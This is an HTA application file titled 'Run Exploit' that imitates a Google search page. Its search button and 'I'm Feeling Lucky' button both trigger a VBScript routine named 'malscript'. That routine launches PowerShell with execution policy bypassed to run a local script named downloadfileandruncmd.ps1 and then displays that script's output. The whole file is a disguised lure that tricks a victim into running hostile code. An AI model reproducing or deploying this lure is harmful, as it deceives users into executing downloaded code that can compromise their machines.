<HTML>
<HEAD><TITLE>Run Exploit</TITLE>
<HTA:APPLICATION ID="oHTA";
  APPLICATIONNAME="Displaynodes";
  BORDER="thin";
  BORDERSTYLE="normal";
  SINGLEINSTANCE="no";
>

<style type="text/css">
    INPUT.button {
     FONT-SIZE: 220%; HEIGHT: 71px; WIDTH: 165px; BACKGROUND: url(AAAAAAAAAAAAAAAAAAAA) #800000 no-repeat left 50%; WHITE-SPACE: normal; FONT-WEIGHT: bold; COLOR: #fff; PADDING-BOTTOM: 10px; PADDING- PADDING-RIGHT: 0px; box-shadow: 10px 10px 5px #888888; border-radius: 500px
     }
A {text-decoration: none;} 
  a:link {color: black;  background-color: transparent;  text-decoration: none;}
INPUT.myButton {
	box-shadow:inset 0px 1px 0px 0px #ffffff;
	background:linear-gradient(to bottom, #ffffff 5%, #f6f6f6 100%);
	background-color:#ffffff;
	border-radius:6px;
	border:1px solid #dcdcdc;
	display:inline-block;
	cursor:pointer;
	color:#666666;
	font-family:Arial;
	font-size:20px;
	font-weight:bold;
	padding:6px 10px;
	text-decoration:none;
	text-shadow:0px 1px 0px #ffffff;
}
INPUT.myButton:hover {
	background:linear-gradient(to bottom, #f6f6f6 5%, #ffffff 100%);
	background-color:#f6f6f6;
}
INPUT.myButton:active {
	position:relative;
	top:1px;
}
</style>
</HEAD>

<BODY BGCOLOR="white" >
<CENTER>

	<SCRIPT language="VBScript" type="text/vbscript">
	set objShell = CreateObject("WScript.Shell")
	strOut=""
	sub malscript
	cmdarg="%comspec% /c powershell.exe -ExecutionPolicy bypass -file c:\temp\downloadfileandruncmd.ps1 "
	set objExCmd = objShell.Exec(cmdarg)
	strOut=objExCmd.StdOut.ReadAll
	Set regEx = New RegExp
	regEx.Pattern = "[\f\n\r\v]+"
	regEx.Global = True
	regEx.Multiline = True
	strOut = regEx.Replace(strOut, "<br>")
	TraceOut.innerHTML= strOut
	end sub
	//-->
</SCRIPT>

<input size="50" maxlength="2048" name="search" placeholder="Search Google or type a URL" type="text" aria-autocomplete="both" aria-haspopup="false" autocapitalize="off" autocomplete="off" autocorrect="off" autofocus="" role="combobox" spellcheck="false" title="Search" value="" aria-label="Search"><img class="voice"   style="height: 25px; width: 25px;" src="https://upload.wikimedia.org/wikipedia/commons/thumb/e/e8/Google_mic.svg/716px-Google_mic.svg.png" title="Search by Voice"></a><BR /><BR />
<INPUT class="mybutton" type="submit" value="Google Search" onclick="malscript"><INPUT class="mybutton" type="submit" value="I'm Feeling Lucky" onclick="malscript">

		<DIV id=TraceOut></DIV>

	<SCRIPT language="JavaScript">
	<!--
		if (window.resizeTo) self.resizeTo(600,400);
	//-->
	</SCRIPT>
<BR />
</CENTER>
</BODY>
</HTML>